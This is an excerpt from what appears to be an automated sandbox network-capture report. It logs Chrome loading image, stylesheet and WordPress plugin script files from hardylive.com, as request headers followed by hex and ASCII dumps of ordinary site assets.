                                                        2025-03-11 18:02:49 UTC16384INData Raw: 0c 07 fa 64 d9 70 e1 47 9b be 2f eb 41 9a 7d f3 c0 08 e3 ac ac 27 ec f7 78 c8 9c ae d5 8b e1 b9 3b d6 45 f0 dd d8 e9 0a cb 21 57 b8 dc df e8 04 07 80 6a cc cc 7b aa ed 9c d9 5a 49 24 df 7a be 7b 4f de 14 70 af 1e 3b e7 78 a6 12 b0 3d d7 ba 98 71 de 7b fd d3 f5 a0 f5 c9 35 fa 6c 32 b8 33 4f 8e 0c e5 3d 01 19 f9 40 ed 13 6a 86 6a 23 0c 13 f8 47 59 bf 54 93 6e a1 3e f9 26 de ac 0e af cd 23 83 cf 43 42 cf a9 ff 7a 4c 1e 75 79 b5 f9 dd 6c 7f 53 1f 02 ef 61 bd 61 97 a5 ee 30 c7 4c 54 76 82 c0 33 96 e2 2c 8c 32 0a e5 73 64 54 01 72 e7 55 7d 45 dd 03 95 9c dd 6c 00 31 e0 b7 7a a2 60 58 0f 61 2a 68 7b 1f 9a 71 1a 69 75 55 e3 5c de 1a 16 aa 22 4c fe ba d0 b4 40 f9 54 95 d6 58 d9 52 55 87 be 46 03 67 f6 5d 73 e5 c4 dd 17 45 c1 ce 14 b3 35 ab 56 30 df cb 58 ac d2 16
                                                        Data Ascii: dpG/A}'x;E!Wj{ZI$z{Op;x=q{5l23O=@jj#GYTn>&#CBzLuylSaa0LTv3,2sdTrU}El1z`Xa*h{qiuU\"L@TXRUFg]sE5V0X
                                                        2025-03-11 18:02:49 UTC16384INData Raw: 4e 83 73 63 4f 46 65 51 fa ca 2d 92 67 69 24 f3 18 52 4e e8 13 b2 fd 6f 19 37 d2 57 7a 9a 0d 5f 74 ba b9 22 3f ea 7a 3c 51 d5 eb 6c 26 b5 91 42 2c 35 ec a5 22 fa 7d 12 5c d9 11 db 69 5e 93 7c 7d c3 f0 b1 a2 52 9f 9c bd d8 19 e8 b4 6c 0f 3b 7f 24 89 8c d1 bb f9 27 64 78 77 e1 f2 41 2a c6 cd ba 31 0f 5f 77 f0 66 24 6f 72 97 77 a6 56 a5 15 24 0a c8 e9 54 1d db 48 06 69 f9 f3 03 fa f2 d3 4c 16 db e2 16 fc e4 6c 56 07 63 5c a0 a7 bc be 37 4f 0b ec 8a 9a 0e b7 f4 c5 b9 52 86 44 29 d7 5d ee f8 bc 8c 42 ee d1 01 d3 e4 b6 3d 33 95 e8 e9 71 46 c9 4d 4d c9 e8 c8 93 86 42 ca fc 67 b7 c9 d8 db 0a ad 4f 4d 5b fa d4 b0 60 12 10 f4 ad 57 5b 70 42 ce 89 74 0c bb df 02 69 ca 5c f6 f1 60 de 7b 19 58 ea d1 f1 2f 29 d3 c6 a9 63 44 bb 52 a7 ff 50 76 7a ee 8b 78 9f ee a6 34 39
                                                        Data Ascii: NscOFeQ-gi$RNo7Wz_t"?z<Ql&B,5"}\i^|}Rl;$'dxwA*1_wf$orwV$THiLlVc\7ORD)]B=3qFMMBgOM[`W[pBti\`{X/)cDRPvzx49
                                                        2025-03-11 18:02:49 UTC16384INData Raw: aa 1c ce d7 3a 2b 06 2f a1 9d af d5 d2 ad fd 5b 2d 57 98 c0 20 70 02 94 04 c0 d0 33 14 76 e8 ed 5c 75 71 c7 47 47 2b d4 9b 44 58 29 dd e0 9e 03 27 d6 06 e3 b7 26 4d eb 75 19 c6 97 d3 c3 9b 7e 45 ad bc de 88 8c 57 7f 17 70 a7 f6 db 35 02 4a d9 70 47 d5 a0 d3 d2 f4 b4 30 cc ea 8c 5f d5 d4 8d aa 8e 00 df 71 57 ff c4 98 94 98 0a 7f 5d 35 98 78 0c 92 00 c9 f6 a0 9e 16 e0 f9 31 cb 79 75 d2 26 e6 a7 0e af 38 48 c8 8f 27 13 9f fe 3b a4 d2 40 bb 3c 51 ee 76 f5 38 b9 84 8c ad be 75 56 ac 3c 1e e6 b7 c9 a6 45 59 29 16 2b 99 ef 74 6e b9 b1 7c ce df b2 d5 4b b5 f4 95 0c d4 1f dd e9 b5 d5 33 2a 89 cb 16 a8 ea 22 db fc b6 02 f6 de ab 23 23 1b fa 1e f0 b8 db 0d 92 d0 8e 4e d9 69 22 4d 43 a3 46 98 5a c1 75 54 08 0a dd c1 83 a6 37 f4 ed 10 ea 79 5c 3d f7 d1 86 be d1 91 63
                                                        Data Ascii: :+/[-W p3v\uqGG+DX)'&Mu~EWp5JpG0_qW]5x1yu&8H';@<Qv8uV<EY)+tn|K3*"##Ni"MCFZuT7y\=c
                                                        2025-03-11 18:02:49 UTC11831INData Raw: ee 54 64 6e 16 9d b8 b8 59 b3 ed e6 f5 4a 4d 36 40 e0 e7 72 dd 8d 9c 1b f3 4e fb 62 6a be ef d3 44 1d 38 b5 7c 20 cd c2 27 e4 2b 5e 0e b7 6a 8d 8b 74 7d 8c f3 07 fb ce 81 b4 62 46 41 47 c4 8a 90 a4 bd cc 83 f9 e9 a2 2f af 9d 63 96 44 a7 3b 27 66 b4 7b 73 88 29 79 b1 c0 18 27 fa 09 f9 4b 31 37 b4 fa 93 45 e5 d3 6d fa e8 98 b7 d2 94 d3 7f 1b 6b e1 3c 23 fa 04 eb fd af e1 ea a8 8f 53 d4 f8 49 b8 c0 56 90 3a e0 09 c7 65 f0 f8 1b 38 1e 5a 99 28 74 20 69 bb f7 40 3e 06 f6 38 5b 84 e6 c0 eb 34 58 4c ef fd f0 fb 87 7b a2 c0 4a 2e fe 17 ca 14 2e 0a 35 7c 45 bc cf 5e 5d 73 d2 9d 63 9d 43 11 7e e9 e1 1b 07 d8 12 4c 40 fe 21 3d e1 49 a5 14 17 75 7f 7a ea 6d 0e 9a ca 90 5e bd db 49 55 3a 94 10 80 e9 98 64 ff 8d c3 dd 8c 12 61 0e 3f 61 32 68 02 2f 90 b0 c4 69 ee 79 c5
                                                        Data Ascii: TdnYJM6@rNbjD8| '+^jt}bFAG/cD;'f{s)y'K17Emk<#SIV:e8Z(t i@>8[4XL{J..5|E^]scC~L@!=Iuzm^IU:da?a2h/iy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449771198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC626OUTGET /wp-content/themes/jnews/assets/img/jeg-empty.png HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:50 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:48 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70
                                                        Connection: close
                                                        Last-Modified: Thu, 18 Jul 2024 15:35:14 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:50 UTC70INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 06 00 00 00 1f 15 c4 89 00 00 00 0d 49 44 41 54 08 99 63 f8 ff ff 3f 03 00 08 fc 02 fe 85 cd ab 34 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRIDATc?4IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449773198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC610OUTGET /wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.7.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:50 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:48 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 12942
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:50 UTC12942INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 6e 65 72 5f 5f 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 38 35 36 2c 2e 30 37 30 33 2c 2e 34 31 34 33 2c 2e 39 32 39 37 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 5f 5f 61 6e 69 6d 61 74 69 6f 6e 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 62 6f 64 79 2e 77 63 2d 62 6c 6f 63 6b 2d 70 72 6f 64 75 63 74 2d 67 61 6c 6c 65 72 79 2d 6d 6f 64 61 6c 2d 6f 70 65 6e 2c 62 6f 64 79 2e
                                                        Data Ascii: @keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loading__animation{to{transform:translateX(100%)}}body.wc-block-product-gallery-modal-open,body.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.449769198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC602OUTGET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?ver=56 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:50 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:48 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 30536
                                                        Connection: close
                                                        Last-Modified: Wed, 18 Dec 2024 14:55:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:50 UTC16165INData Raw: 76 61 72 20 4c 52 4d 20 3d 20 4c 52 4d 20 3f 20 4c 52 4d 20 3a 20 7b 7d 3b 0a 0a 2f 2f 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 2f 2f 20 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 0a 2f 2a 2a 20 40 76 61 72 20 24 20 6a 51 75 65 72 79 20 2a 2f 0a 2b 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 0a 09 69 66 20 28 20 4c 52 4d 2e 68 6f 6d 65 5f 75 72 6c 5f 61 72 72 2e 73 63 68 65 6d 65 20 21 3d 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 72 65 70 6c 61 63 65 28 22 3a 22 2c 20 22 22 29 20 29 20 7b 0a 09 09 61 6c 65 72 74 28 20 22 41 4a 41 58 20 4c 6f 67 69 6e 20 61 6e 64 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 50 6f 70 75 70
                                                        Data Ascii: var LRM = LRM ? LRM : {};//jQuery(document).ready(function($) {// jQuery(document).ready(/** @var $ jQuery */+(function ($) {if ( LRM.home_url_arr.scheme !== window.location.protocol.replace(":", "") ) {alert( "AJAX Login and Registration Popup
                                                        2025-03-11 18:02:50 UTC14371INData Raw: 64 61 74 61 22 29 2e 6c 65 6e 67 74 68 20 3e 20 30 20 26 26 20 77 69 6e 64 6f 77 2e 61 63 66 20 26 26 20 77 69 6e 64 6f 77 2e 61 63 66 2e 76 61 6c 69 64 61 74 69 6f 6e 2e 61 63 74 69 76 65 20 29 20 7b 0a 09 09 09 09 69 66 20 28 22 79 65 73 22 20 21 3d 3d 20 24 66 6f 72 6d 2e 64 61 74 61 28 22 6c 72 6d 2d 61 63 66 2d 76 61 6c 69 64 61 74 65 64 22 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 09 09 7d 0a 09 09 09 09 2f 2f 20 52 65 73 65 74 20 76 61 6c 69 64 61 74 69 6f 6e 20 66 6c 61 67 0a 09 09 09 09 24 66 6f 72 6d 2e 64 61 74 61 28 22 6c 72 6d 2d 61 63 66 2d 76 61 6c 69 64 61 74 65 64 22 2c 20 22 6e 6f 22 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 24 66 6f 72 6d 2e 66 69 6e 64 28 22 2e 68 61 73 2d 65 72 72 6f 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61
                                                        Data Ascii: data").length > 0 && window.acf && window.acf.validation.active ) {if ("yes" !== $form.data("lrm-acf-validated")) {return;}// Reset validation flag$form.data("lrm-acf-validated", "no");}$form.find(".has-error").removeCla


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.449772198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC594OUTGET /wp-content/plugins/image-map-pro-wordpress/js/image-map-pro.min.js?ver=5.3.2 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:50 UTC220INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:48 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 111181
                                                        Connection: close
                                                        Last-Modified: Fri, 17 Sep 2021 14:30:52 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:50 UTC16164INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 6f 2e 69 6d 61 67 65 4d 61 70 50 72 6f 53 68 61 70 65 44 65 66 61 75 6c 74 73 3d 7b 69 64 3a 22 73 70 6f 74 2d 30 22 2c 74 69 74 6c 65 3a 22 22 2c 74 79 70 65 3a 22 73 70 6f 74 22 2c 78 3a 2d 31 2c 79 3a 2d 31 2c 77 69 64 74 68 3a 34 34 2c 68 65 69 67 68 74 3a 34 34 2c 78 5f 69 6d 61 67 65 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 31 2c 79 5f 69 6d 61 67 65 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 31 2c 77 69 64 74 68 5f 69 6d 61 67 65 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 34 34 2c 68 65 69 67 68 74 5f 69 6d 61 67 65 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 34 34 2c 63 6f 6e 6e 65 63 74 65 64 5f 74 6f 3a 22 22 2c 75 73 65 5f 63 6f 6e 6e 65 63 74 65 64 5f 73 68 61 70 65 5f 74 6f 6f 6c 74 69 70 3a 30 2c 6c 61 79 65 72 49 44 3a 30
                                                        Data Ascii: !function(o){o.imageMapProShapeDefaults={id:"spot-0",title:"",type:"spot",x:-1,y:-1,width:44,height:44,x_image_background:-1,y_image_background:-1,width_image_background:44,height_image_background:44,connected_to:"",use_connected_shape_tooltip:0,layerID:0
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 22 2c 22 22 29 2c 31 3d 3d 70 61 72 73 65 49 6e 74 28 65 2e 79 6f 75 74 75 62 65 2e 61 6c 6c 6f 77 5f 66 75 6c 6c 73 63 72 65 65 6e 2c 31 30 29 26 26 2d 31 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 22 29 26 26 28 74 3d 74 2e 72 65 70 6c 61 63 65 28 22 3e 3c 2f 69 66 72 61 6d 65 3e 22 2c 22 20 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 3e 3c 2f 69 66 72 61 6d 65 3e 22 29 29 2c 61 2b 3d 74 3d 28 74 3d 31 3d 3d 70 61 72 73 65 49 6e 74 28 65 2e 79 6f 75 74 75 62 65 2e 69 66 72 61 6d 65 5f 61 75 74 6f 5f 77 69 64 74 68 2c 31 30 29 3f 74 2e 72 65 70 6c 61 63 65 28 2f 77 69 64 74 68 3d 22 5c 64 2b 22 2f 67 2c 27 77 69 64 74 68 3d 22 31 30 30 25 22 27 29 3a 74 2e 72 65 70 6c
                                                        Data Ascii: allowfullscreen",""),1==parseInt(e.youtube.allow_fullscreen,10)&&-1==t.indexOf("allowfullscreen")&&(t=t.replace("></iframe>"," allowfullscreen></iframe>")),a+=t=(t=1==parseInt(e.youtube.iframe_auto_width,10)?t.replace(/width="\d+"/g,'width="100%"'):t.repl
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 67 65 2d 6d 61 70 2d 6e 61 6d 65 22 29 29 3b 69 66 28 69 29 7b 76 61 72 20 65 3d 66 69 6e 64 53 68 61 70 65 57 69 74 68 54 69 74 6c 65 28 69 2e 73 65 74 74 69 6e 67 73 2e 67 65 6e 65 72 61 6c 2e 6e 61 6d 65 2c 74 29 3b 69 66 28 65 29 7b 76 61 72 20 73 3d 65 2e 73 68 61 70 65 2c 6e 3d 65 2e 69 6e 64 65 78 3b 69 66 28 70 61 72 73 65 49 6e 74 28 73 2e 6c 61 79 65 72 49 44 2c 31 30 29 21 3d 3d 70 61 72 73 65 49 6e 74 28 69 2e 73 65 74 74 69 6e 67 73 2e 72 75 6e 74 69 6d 65 2e 6c 61 79 65 72 49 44 2c 31 30 29 26 26 41 50 49 46 75 6e 63 74 69 6f 6e 51 75 65 75 65 41 64 64 41 63 74 69 6f 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 2e 73 77 69 74 63 68 4c 61 79 65 72 28 73 2e 6c 61 79 65 72 49 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 29 7d 29 7d 29 2c 2d 31
                                                        Data Ascii: ge-map-name"));if(i){var e=findShapeWithTitle(i.settings.general.name,t);if(e){var s=e.shape,n=e.index;if(parseInt(s.layerID,10)!==parseInt(i.settings.runtime.layerID,10)&&APIFunctionQueueAddAction(function(t){i.switchLayer(s.layerID,function(){t()})}),-1
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 61 73 73 3d 22 69 6d 70 2d 73 70 6f 74 2d 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 69 63 6f 6e 22 20 73 74 79 6c 65 3d 22 27 2b 28 72 2b 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2b 79 2e 68 65 69 67 68 74 2b 22 70 78 3b 22 29 2b 27 22 3e 27 2c 65 2b 3d 27 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 27 2b 79 2e 64 65 66 61 75 6c 74 5f 73 74 79 6c 65 2e 69 63 6f 6e 5f 66 6f 6e 74 61 77 65 73 6f 6d 65 5f 69 64 2b 27 22 3e 3c 2f 69 3e 27 2c 65 2b 3d 22 20 20 20 3c 2f 64 69 76 3e 22 7d 69 66 28 22 63 75 73 74 6f 6d 22 3d 3d 3d 79 2e 64 65 66 61 75 6c 74 5f 73 74 79 6c 65 2e 69 63 6f 6e 5f 74 79 70 65 26 26 30 3c 79 2e 64 65 66 61 75 6c 74 5f 73 74 79 6c 65 2e 69 63 6f 6e 5f 75 72 6c 2e 6c 65 6e 67 74 68 26 26 28 65 2b 3d 27 3c 69 6d 67 20
                                                        Data Ascii: ass="imp-spot-fontawesome-icon" style="'+(r+="font-size: "+y.height+"px;")+'">',e+=' <i class="fa fa-'+y.default_style.icon_fontawesome_id+'"></i>',e+=" </div>"}if("custom"===y.default_style.icon_type&&0<y.default_style.icon_url.length&&(e+='<img
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 65 74 74 69 6e 67 73 2e 72 75 6e 74 69 6d 65 2e 69 73 5f 66 75 6c 6c 73 63 72 65 65 6e 29 26 26 28 24 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 30 29 2c 66 75 6c 6c 73 63 72 65 65 6e 4d 61 70 3d 74 68 69 73 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 75 69 2e 66 69 6e 64 28 22 2e 69 6d 70 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 62 75 74 74 6f 6e 22 29 3b 31 21 3d 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 66 75 6c 6c 73 63 72 65 65 6e 2e 66 75 6c 6c 73 63 72 65 65 6e 5f 62 75 74 74 6f 6e 5f 70 6f 73 69 74 69 6f 6e 2c 31 30 29 26 26 34 21 3d 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 66 75 6c 6c 73 63 72 65 65 6e 2e 66 75 6c 6c 73 63 72 65 65 6e 5f 62 75 74 74 6f 6e 5f 70 6f 73 69 74 69 6f 6e
                                                        Data Ascii: ettings.runtime.is_fullscreen)&&($(window).scrollTop(0),fullscreenMap=this);var o=this.ui.find(".imp-fullscreen-button");1!==parseInt(this.settings.fullscreen.fullscreen_button_position,10)&&4!==parseInt(this.settings.fullscreen.fullscreen_button_position
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 69 6e 67 73 2e 74 6f 6f 6c 74 69 70 73 2e 73 68 6f 77 5f 74 6f 6f 6c 74 69 70 73 26 26 74 68 69 73 2e 68 69 64 65 41 6c 6c 54 6f 6f 6c 74 69 70 73 28 29 29 3b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 45 76 65 6e 74 52 65 6c 61 74 69 76 65 43 6f 6f 72 64 69 6e 61 74 65 73 28 74 29 2c 6f 3d 28 73 3d 74 68 69 73 2e 6d 61 74 63 68 53 68 61 70 65 54 6f 43 6f 6f 72 64 73 28 61 29 2c 74 68 69 73 2e 67 65 74 45 76 65 6e 74 43 6f 6f 72 64 69 6e 61 74 65 73 28 74 29 29 3b 2d 31 21 3d 73 26 26 28 6f 2e 78 3e 74 68 69 73 2e 77 72 61 70 4f 66 66 73 65 74 4c 65 66 74 26 26 6f 2e 78 3c 74 68 69 73 2e 77 72 61 70 4f 66 66 73 65 74 4c 65 66 74 2b 74 68 69 73 2e 77 72 61 70 57 69 64 74 68 26 26 6f 2e 79 3e 74 68 69 73 2e 77 72 61 70 4f 66 66 73 65 74 54 6f 70 26 26 6f 2e
                                                        Data Ascii: ings.tooltips.show_tooltips&&this.hideAllTooltips());var a=this.getEventRelativeCoordinates(t),o=(s=this.matchShapeToCoords(a),this.getEventCoordinates(t));-1!=s&&(o.x>this.wrapOffsetLeft&&o.x<this.wrapOffsetLeft+this.wrapWidth&&o.y>this.wrapOffsetTop&&o.
                                                        2025-03-11 18:02:51 UTC13097INData Raw: 73 2e 74 6f 6f 6c 74 69 70 73 2e 73 74 69 63 6b 79 5f 74 6f 6f 6c 74 69 70 73 29 7c 7c 28 6f 2d 3d 67 2e 68 65 69 67 68 74 2f 32 29 2c 68 3d 67 2e 77 69 64 74 68 2c 72 3d 67 2e 68 65 69 67 68 74 29 2c 22 73 70 6f 74 22 3d 3d 3d 67 2e 74 79 70 65 26 26 69 73 54 72 75 65 28 67 2e 64 65 66 61 75 6c 74 5f 73 74 79 6c 65 2e 69 63 6f 6e 5f 69 73 5f 70 69 6e 29 26 26 22 73 70 6f 74 22 3d 3d 3d 67 2e 74 79 70 65 26 26 69 73 54 72 75 65 28 67 2e 64 65 66 61 75 6c 74 5f 73 74 79 6c 65 2e 75 73 65 5f 69 63 6f 6e 29 26 26 21 69 73 54 72 75 65 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 74 6f 6f 6c 74 69 70 73 2e 73 74 69 63 6b 79 5f 74 6f 6f 6c 74 69 70 73 29 26 26 28 6f 2d 3d 72 2f 32 29 2c 69 73 54 72 75 65 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 75 6e 74
                                                        Data Ascii: s.tooltips.sticky_tooltips)||(o-=g.height/2),h=g.width,r=g.height),"spot"===g.type&&isTrue(g.default_style.icon_is_pin)&&"spot"===g.type&&isTrue(g.default_style.use_icon)&&!isTrue(this.settings.tooltips.sticky_tooltips)&&(o-=r/2),isTrue(this.settings.runt


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.449770198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC586OUTGET /wp-content/plugins/metorik-helper/assets/js/metorik.min.js?ver=2.0.9 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:50 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:48 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 63928
                                                        Connection: close
                                                        Last-Modified: Fri, 21 Feb 2025 19:55:25 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:50 UTC16165INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 74 3d 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 74 3d 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 28 74 3d 73 65 6c 66 29 2c 74 2e 73 62 6a
